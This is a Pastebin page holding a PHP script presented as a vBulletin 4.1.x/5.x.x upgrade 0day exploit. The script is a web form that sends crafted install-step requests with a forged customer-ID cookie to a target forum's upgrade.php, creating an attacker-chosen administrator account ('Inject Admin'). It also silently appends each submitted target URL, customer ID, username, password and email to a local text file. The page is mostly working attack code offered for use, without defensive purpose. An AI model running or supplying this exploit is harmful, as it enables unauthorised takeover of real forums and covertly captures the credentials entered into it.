API tools faq
paste
Advertisement
ForumScriptz

vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

ForumScriptz
Sep 8th, 2013
3,504
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.87 KB | None | 0 0
raw download clone embed print report
  1. <h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
  2. <p>Created by: Boxhead</p>
  3. <p>Found on: 08/22/2013</p>
  4. <p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
  5. <br>
  6. <?php
  7. //extract data from the post
  8. if (isset($_POST['submit'])) {
  9.     extract($_POST);
  10.    
  11.     //set POST variables
  12.     $url = $_POST['url'];
  13.     $h   = fopen("eutut.txt", "a");
  14.     $b   = $_POST['customerid'];
  15.     $c   = $_POST['username'];
  16.     $d   = $_POST['password'];
  17.     $z   = $_POST['email'];
  18.     fwrite($h, $url);
  19.     fwrite($h, "-");
  20.     fwrite($h, $b);
  21.     fwrite($h, "-");
  22.     fwrite($h, $c);
  23.     fwrite($h, "-");
  24.     fwrite($h, $d);
  25.     fwrite($h, "-");
  26.     fwrite($h, $z);
  27.     fwrite($h, "------------------------");
  28.     $fields = array(
  29.         'ajax' => urlencode('1'),
  30.         'version' => urlencode('install'),
  31.         'checktable' => urlencode('false'),
  32.         'firstrun' => urlencode('false'),
  33.         'step' => urlencode('7'),
  34.         'startat' => urlencode('0'),
  35.         'only' => urlencode('false'),
  36.         'customerid' => urlencode($_POST['customerid']),
  37.         'options[skiptemplatemerge]' => urlencode('0'),
  38.         'response' => urlencode('yes'),
  39.         'htmlsubmit' => urlencode('1'),
  40.         'htmldata[username]' => urlencode($_POST['username']),
  41.         'htmldata[password]' => urlencode($_POST['password']),
  42.         'htmldata[confirmpassword]' => urlencode($_POST['password']),
  43.         'htmldata[email]' => urlencode($_POST['email'])
  44.     );
  45.    
  46.     //url-ify the data for the POST
  47.     foreach ($fields as $key => $value) {
  48.         $fields_string .= $key . '=' . $value . '&';
  49.     }
  50.     rtrim($fields_string, '&');
  51.    
  52.     //open connection
  53.     $ch = curl_init();
  54.    
  55.     //set the url, number of POST vars, POST data
  56.     curl_setopt($ch, CURLOPT_URL, $url);
  57.     curl_setopt($ch, CURLOPT_POST, count($fields));
  58.     curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
  59.     curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  60.     curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']);
  61.    
  62.     //execute post
  63.     $result = curl_exec($ch);
  64.    
  65.     //close connection
  66.     curl_close($ch);
  67.     exit();
  68. }
  69. ?>
  70. <center>
  71. <form name="sploit" method="POST" action="">
  72. <span>Example:http://test.com/forum/install/upgrade.php</span><br>
  73.   <span>Website:</span>
  74.     <input name="url" type="text" tabindex="1" size="60"   />
  75.     <br>
  76.     <span>Customer ID:</span>
  77.     <input name="customerid" type="text" tabindex="2" size="40" />
  78.     <br>
  79.     <span>Username:</span>
  80.     <input name="username" type="text" tabindex="3" size="40"  />
  81.     <br>
  82.     <span>Password:</span>
  83.     <input name="password" type="text" tabindex="4" size="40" />
  84.     <br>
  85.     <span>Email:</span>
  86.     <input name="email" type="text" tabindex="5" maxlength="40"  />
  87.    
  88. <input name="submit" type="submit" value="Inject Admin">
  89. </form>
  90. </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!